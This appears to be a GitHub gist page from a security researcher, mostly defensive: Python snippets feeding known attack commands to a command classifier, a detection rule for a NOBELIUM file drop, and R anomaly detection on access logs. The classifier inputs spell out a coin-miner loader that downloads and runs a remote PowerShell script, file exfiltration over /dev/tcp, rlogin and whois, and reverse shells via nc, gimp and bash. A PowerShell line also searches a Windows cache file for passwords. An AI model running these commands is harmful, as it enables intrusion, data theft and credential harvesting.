Skip to content

Instantly share code, notes, and snippets.

Avatar

Russ McRee holisticinfosec

View GitHub Profile
View LOLC_CoinMiners.py
# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas
@holisticinfosec
holisticinfosec / LOLC_FileUploads.py
Created Dec 28, 2021
from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
View LOLC_FileUploads.py
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
'whois -h $RHOST -p $RPORT base64 $LFILE']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
@holisticinfosec
holisticinfosec / LOLC_ReverseShells.py
Created Dec 28, 2021
from GTFOBins: reverse shell examples via nc, gimp, and bash
View LOLC_ReverseShells.py
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shellc
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -e /bin/sh $RHOST $RPORT',
'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
View rules_windows_nobellium_filedrop.json
[
{
"title": "NOBELLIUM FoggyWeb File Drop Sysmon",
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
"tags": [
"attack.persistence",
"attack.defense_evasion"
],
"level": "critical",
View sim_toolsmith_demo.xml
<?xml version="1.0" encoding="utf-8"?>
<sim>
<delete>false</delete>
<errordirectory>C:\Users\Public\Documents\</errordirectory>
<task>
<config>
<name>PowerShell_test</name>
<loop>3</loop>
<pause>1000</pause>
</config>
@holisticinfosec
holisticinfosec / WaitList.dat.ps1
Created Sep 19, 2018
Barnaby Skeggs's WaitList.dat PowerShell enumerator
View WaitList.dat.ps1
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password"
@holisticinfosec
holisticinfosec / Decomposition_Anomalized_Downloads.R
Last active Jun 3, 2018
Decomposition of Anomalized SERVER-549521 Downloads
View Decomposition_Anomalized_Downloads.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
filter(server == "SERVER549521") %>%
ungroup() %>%
time_decompose(count) %>%
anomalize(remainder) %>%
plot_anomaly_decomposition() +
labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
@holisticinfosec
holisticinfosec / SERVER-549521_Anomalies_STL+IQR.R
Last active Jun 3, 2018
SERVER-549521 Anomalies STL + IQR Methods
View SERVER-549521_Anomalies_STL+IQR.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
SERVER549521 %>%
# STL + IQR Anomaly Detection
time_decompose(count, method = "stl", trend = "4 months") %>%
anomalize(remainder, method = "iqr") %>%
time_recompose() %>%
# Anomaly Visualization
plot_anomalies(time_recomposed = TRUE) +
labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
@holisticinfosec
holisticinfosec / SERVER-549521_Anomalies_Twitter+GESD.R
Last active Jun 16, 2018
SERVER-549521 Anomalies Twitter + GESD Methods
View SERVER-549521_Anomalies_Twitter+GESD.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Get only SERVER549521 access
SERVER549521 <- security_access_logs %>%
filter(server == "SERVER-549521") %>%
ungroup()
# Anomalize!!
SERVER549521 %>%
# Twitter + GESD
time_decompose(count, method = "twitter", trend = "4 months") %>%
View Security_Event_Log_Anomalies.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
# Data Manipulation / Anomaly Detection
time_decompose(count, method = "stl") %>%
anomalize(remainder, method = "iqr") %>%
time_recompose() %>%
# Anomaly Visualization
plot_anomalies(time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) +
labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods")